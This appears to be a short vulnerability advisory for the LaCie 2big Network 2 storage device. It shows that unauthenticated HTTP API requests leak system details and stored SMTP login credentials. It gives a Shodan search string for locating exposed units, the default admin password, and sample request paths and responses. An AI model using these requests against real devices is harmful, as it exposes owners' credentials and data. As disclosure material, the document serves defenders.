LaCie 2big Network 2 Unauthenticated Remote Information Disclosure

Vendor: LaCie
Product: 2big Network 2

On Shodan, you can find these devices with the following search string:

Server: lighttpd/1.4.28-devel-7925

Note that the device has a default “admin” account, and the default password is “admin”. But that isn’t needed to exploit this issue!

By loading the web interface of the device, the login page will appear. In the background, it also causes your browser to make several API requests against the server. These requests go over plain HTTP (no SSL), require no authentication, and can return sensitive information.

POST /api/v2/system/info HTTP/1.1

<product_id>
2bignetwork2
</product_id>
<software_version>
2.2.9.1
</software_version>
[..]
<product_name>
2big Network 2
</product_name>

POST /api/v2/system/general HTTP/1.1

<workgroup>
DARIUS
</workgroup>
<ntpServer>
pool.ntp.org
</ntpServer>
<hostname>
Darius-Backup
</hostname>
<timezone>
Europe/Amsterdam
</timezone>
<system_version>
2.2.8.3
</system_version>

POST /api/v2/system/smtp HTTP/1.1

<smtp_auth_user>
darius.freamon@gmail.com
</smtp_auth_user>
<smtp_auth_pwd>
mYpassw0rdn0treally
</smtp_auth_pwd>
<smtp_server>
mail.google.com
</smtp_server>

Discovered: 2013-04-07
